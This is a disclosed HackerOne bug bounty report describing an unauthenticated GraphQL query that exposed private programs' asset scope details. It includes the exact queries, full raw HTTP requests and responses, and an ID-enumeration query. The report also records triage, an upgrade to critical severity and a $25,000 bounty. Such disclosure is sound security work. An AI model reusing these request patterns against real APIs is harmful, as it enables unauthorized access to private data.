Disclosing PolicyPageAssetGroup in Private Programs via /graphql `gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/{id}`
Summary by haxta4ok00
Timeline
submitted a report to HackerOne.
Summary:
Hi team, I understand what's going on
Description:
Just a recent update gives the results of private programs
### Steps To Reproduce
Without authorization
GraphQL:
{"query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/3981-41287\"){... on PolicyPageAssetGroupDocument{id,name}}}"}Answer:
{"data":{"node":{"id":"Z2lkOi8vaGFja2Vyb25lL1BvbGljeVBhZ2VBc3NldEdyb3Vwc0luZGV4OjpQb2xpY3lQYWdlQXNzZXRHcm91cC8zOTgxLTQxMjg3","name":"██████"}}}This is Asset program - █████████
Thanks!
Impact
Disclosing Sсope(Assets) in Private Programs
changed the status to Needs more info.
Hi @haxta4ok00,
Please can you provide the full raw HTTP request to facilitate triage.
Thanks,
@menco
changed the status to New.
Hi @menco -- Burp request , Without authorization
1POST /graphql HTTP/2
2Host: hackerone.com
3Content-Length: 208
4Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96"
5Accept: */*
6Content-Type: application/json
7Sec-Ch-Ua-Platform: "Windows"
8Origin: https://hackerone.com
9Sec-Fetch-Site: same-origin
10Sec-Fetch-Mode: cors
11Sec-Fetch-Dest: empty
12
13{"query":"{node(id:\"gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/3981-41287\"){... on PolicyPageAssetGroupDocument{id,name,in_scope_count,out_of_scope_count,structured_scopes_count}}}"}
Answer:
{"data":{"node":{"id":"Z2lkOi8vaGFja2Vyb25lL1BvbGljeVBhZ2VBc3NldEdyb3Vwc0luZGV4OjpQb2xpY3lQYWdlQXNzZXRHcm91cC8zOTgxLTQxMjg3","name":"████","in_scope_count":70,"out_of_scope_count":4,"structured_scopes_count":74}}} changed the status to Needs more info.
changed the status to New.
Hi @menco --
1)
gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/3981-41287 1.1) 41287 - ID private program , here is █████ , you can check this ██████
1.2) 3981 - ID PolicyPageAssetGroup of this program
- gid://hackerone/PolicyPageAssetGroupsIndex::PolicyPageAssetGroup/IDPolicyPageAssetGroup-IDPrivate program
posted a comment.
Hi @haxta4ok00,
How can a malicious actor enumerate these numerical values?
Does the hacker have to try 9999x99999 values to enumerate valid programs?
Thanks,
@menco
posted a comment.
Hi @menco --
1) what exactly do you want to hear?
2) Have you checked my PoC is it valid?
If item 2) is correct, could you pass this to the team( by analogy #1609367) ,Thanks!
Does the hacker have to try 9999x99999 values to enumerate valid programs?Yes, but right now in H1 platform has 58175 program (sandboxed,private,public,external) But we are more interested in external program. Their number is even less. I don't know if this request works for full private programs.
Thanks
posted a comment.
Hi @haxta4ok00,
Thank you for your response, the intention behind my message was to confirm that there is no way to more accurately enumerate the IDs.
I've validated the report, and will pass it on internally.
Thanks,
@menco
posted a comment.
Hey @menco -- Now I understand you, I should have asked this right away. :)
In our case, Since I can't confirm if this works for full private programs:
1POST /graphql HTTP/2
2Host: hackerone.com
3Content-Length: 76
4Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
5Accept: */*
6Content-Type: application/json
7Sec-Ch-Ua-Mobile: ?0
8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
9Sec-Ch-Ua-Platform: "Windows"
10Origin: https://hackerone.com
11Sec-Fetch-Site: same-origin
12Sec-Fetch-Mode: cors
13Sec-Fetch-Dest: empty
14
15{"query":"{teams(where:{state:{_eq:null}}){total_count,nodes{_id,handle}}}"}
Will give you a list including program IDs. Those. second attribute from enumeration.
Thanks, and Have a nice day @menco !
posted a comment.
Hi @haxta4ok00,
Understood, that definitely brings down the number of possible numerical values.
Thank you for the further explanation,
@menco
HackerOne staff
changed the status to Triaged. Thanks @haxta4ok00, we'll look into this!
posted a comment.
HackerOne staff
closed the report and changed the status to Resolved. HackerOne staff
updated the severity from high (7.7)
to critical (9.3)
. Hi @haxta4ok00 - thanks again for bringing this to our attention. After our internal investigation, the team determined that this vulnerability could have been used to access the titles of reports. Because of that we're increasing the severity to critical. The incident response team determined that this vulnerability was not exploited other than you proving the existence of it for this report.
rewarded haxta4ok00 with a $25,000 bounty.
posted a comment.
Hi @jobert -- WoW , Thank you for the bounty!
requested to disclose this report.
Hi team, @jobert -- Happy new year!
After a long time, can we disclose this report?
Thanks!
posted a comment.
Hi , It looks like the report is ready after editing. :)
Thanks!
HackerOne staff
agreed to disclose this report. This report has been disclosed.
